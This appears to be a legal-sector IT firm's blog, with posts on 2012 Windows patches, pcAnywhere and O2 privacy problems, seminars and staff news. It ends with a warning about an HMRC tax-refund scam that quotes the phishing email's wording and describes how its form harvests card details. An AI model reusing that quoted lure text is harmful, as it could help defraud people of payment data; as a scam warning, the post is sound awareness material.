Hello and welcome to SproutIT’s Blog.
Please use the menu tabs, above, to navigate – you will find information posted here that is relevant and useful to the LegalIT market, as well as white papers that address Specific LegalIT challenges, along with Sprout company updates.
CJSM and TSOL, to name but two, require you to have centrally managed updates for Windows, across your whole organisation. Microsoft release critical updates every second Tuesday of the month, known as Patch Tuesday.
Do you take note of these – does your IT dept make sure your servers and worksations are up-to-date? If not, they should be!
• Security updates or critical updates protect against vulnerabilities to malware and security exploits. Other updates correct errors that aren’t related to security, or enhance functionality.
• Security updates are routinely provided (by Microsoft) on the second Tuesday of each month, Patch Tuesday, but can also be provided whenever a new update is urgently required to prevent a newly discovered or prevalent exploit targeting Windows users.
This is the first time I recall seeing Windows XP have fewer fixes released than Windows 7. Will this be a new pattern going forward?
Microsoft considers four of these critical and SophosLabs agrees, assigning MS12-016, MS12-013, MS12-010 and MS12-008 a high rating.
MS12-008 is a kernel driver vulnerability that could lead to remote code execution, MS12-010 is a remote execution flaw in all versions of Internet Explorer, MS12-013 is a remote code execution vulnerability in the C run-time on Windows 7/Vista/2008 and MS12-016 is a remote code execution vulnerability in Silverlight and the .NET framework.
Microsoft rated the remaining five as Important. SophosLabs agrees with two of these rating, MS12-009 and MS12-011, but considers MS12-015 to be medium and MS12-012 and MS12-014 to be high risk.
MS12-015 is a remote code execution in Visio Viewer that is triggered by a malicious Visio file, MS12-012 could allow remote code execution when opening a .icc (color profile) file on Windows 2008 and MS12-014 could allow an attacker to remotely execute code by tricking a user into loading a media file on Windows XP SP3.
As always the best practice is to apply all of these as soon as possible.
California-based forensics software vendor Passware has released the latest version of its toolkit, which the company claims can bypass Apple’s FileVault 2 disk encryption “in minutes,” as well as volumes encrypted with TrueCrypt.
Our breakfast seminar to discuss data security and some straightforward solutions, went ahead this morning. It was very well attended and the overwhelming feedback was that presenters, and the quality of the seminar and its content were excellent.
Presentations from Sprout Director, Danny Killeen, Mimecast’s Eliza Hedegaard and Vigilante Bespoke’s Oliver Crofton discussed the common issues we face regarding data security and, crucially, simple and effective ways of addressing them.
If you would like information on the content of the seminar, details of future events or further information on any of the speakers, please do get in touch – contact details are on our website.
As reported by Sophos and Symantec themselves, the blueprints for current versions of its pcAnywhere software were stolen in 2006 and that all users are at risk of attack and should pull the plug.
Here’s what the security firm had to say about the pcAnywhere-specific risks, as paraphrased from its white paper:
.
The encoding and encryption elements within pcAnywhere are vulnerable, making users susceptible to man-in-the-middle attacks, depending on the configuration and use of the product. If a man-in-the-middle attack should occur, the malicious user could steal session data or credentials.
A secondary risk: If a malicious user obtains the cryptographic key, they can launch unauthorized remote control sessions and thus access systems and sensitive data.
If the cryptographic key itself is using Active Directory credentials, it is also possible for attackers to perpetrate other malicious activities on the network.
In an internal pcAnywhere environment, if a network sniffer was in place on a customer’s internal network and the attacker had access to the encryption details, the pcAnywhere traffic could be intercepted and decoded. This implies that a customer either has a malicious insider who planted the network sniffer or has an unknown Botnet operating in their environment. As always, security best practices are encouraged to mitigate this risk.
Since pcAnywhere exchanges user login credentials, the risk exists that a network sniffer or Botnet could intercept this exchange of information, though it would still be difficult to actually interpret the data even if the pcAnywhere source code is released.
For environments with remote users, this credential exchange introduces an additional level of exposure to external attacks
Here’s another data breach that has taken a long time to come into the public domain. Who supressed that information – the hackers, or Symantec? Time will tell but, for now, you have been warned.
As reported by Sophos today, O2 mobile users in the UK are venting on Twitter today, fuming at their discovery that their phone number is being shared with every website that they visit over the network.
I found a colleague who owns an iPhone on the O2 network, and we tried it out for ourselves. Making sure we turned off his WiFi connection, we used the O2 mobile network to access the web.
Sure enough, his mobile number was being secretly communicated to websites he visited, embedded inside an http header called HTTP_X_UP_CALLING_LINE_ID.
If your response is green then you are OK – if it’s red, you may not be too happy.
O2′s response so far is to tell concerned Twitter users that it is investigating the issue.
There are reports that o2 are scrambling to fix this today – we shall see. There are also reports that this was first reported in the press TWO YEARS AGO……
And you thought your mobile browsing was private………!? All those advertising SMS messages are not so surprising now, I guess.
Our seminar next Friday only has a few places left; there will be an excellent crowd of professionals from various chambers and a great chance to network with others in your sector too…..
Please join us at our complimentary breakfast seminar. Practice Managers, CEOs and Senior Clerks are likely to be aware of the new and increasing data security demands. This seminar will address those demands and demonstrate how it is easy, straightforward and inexpensive to achieve compliance along with minimal overheads.
Sign up here to secure your place: http://www.sproutit.co.uk/events/
You will be responsible for all IT procurement for our growing client base using automated quotation and online quote approval systems.
You will be responsible for turning approved quotes into orders through our four primary suppliers and scheduling delivery and feedback to the business and client as to delivery dates. You will work with the ServiceDesk Supervisor and Service Delivery Manager to ensure speedy install/provisioning of purchased equipment.
If you think you can help a growing and dynamic IT Company based in Fleet Street, Central London, delivering premium IT management services to the Legal Sector, click below.
We are very pleased to announce that we have recruited internally for this critical new position – ServiceDesk Team Leader.
Sprout’s ServiceDesk is an integral part of our outstanding service delivery and, with our growing portfolio of clients, we are acting to ensure our service levels remain of the highest standard.
Brendan Martindale holds a Bachelor’s Degree in Information Technology and has service delivery experience from previous employment in New Zealand.
In other recruitment news, Brendan’s team will be further bolstered by the new appointment of Chris Rabbatts who joins in the next few weeks as a ServiceDesk Analyst.
Both appointments demonstrate Sprout’s unwavering determination to deliver the highest possible level of service to all of our clients.
Sprout are delighted to announce that, from the 6th February 2012, Old Square Chambers will become the latest client to join our portfolio. Old Square joins a growing list of prestigious Chambers to contract Sprout to provide full IT support, consultancy and strategy.
Continue reading
Emails are currently circulating that purport to be sent by the UK tax organization HM Revenue & Customs (HMRC). These e-mails claim that the recipient is eligible to receive a tax refund and that he or she must download an attached file and open it in a browser.
Ensure you have adequate email protection – is there any reason not to use a product that boasts 100% uptime, 99% spam blocking accuracy and a 100% virus record?
The scam e-mail reads in part:
TAX REFUND NOTIFICATION
Dear Taxpayer,
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.
Please submit the tax refund request and allow us 6-9 days in order to process it.
To access your tax refund, please follow the steps below:
- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen
A refund can be delayed for a variety of reasons. For example submitting invalid records or applying after the deadline.
Opening the attached file displays a form which prompts the victim to fill in his or her full name, date of birth, complete address, phone number, and credit card or debit card information.
Of course, submitting the form won’t actually send the information to HMRC; it will instead be sent to a malicious third party without the victim’s knowledge or approval.
Source: www.sophos.com
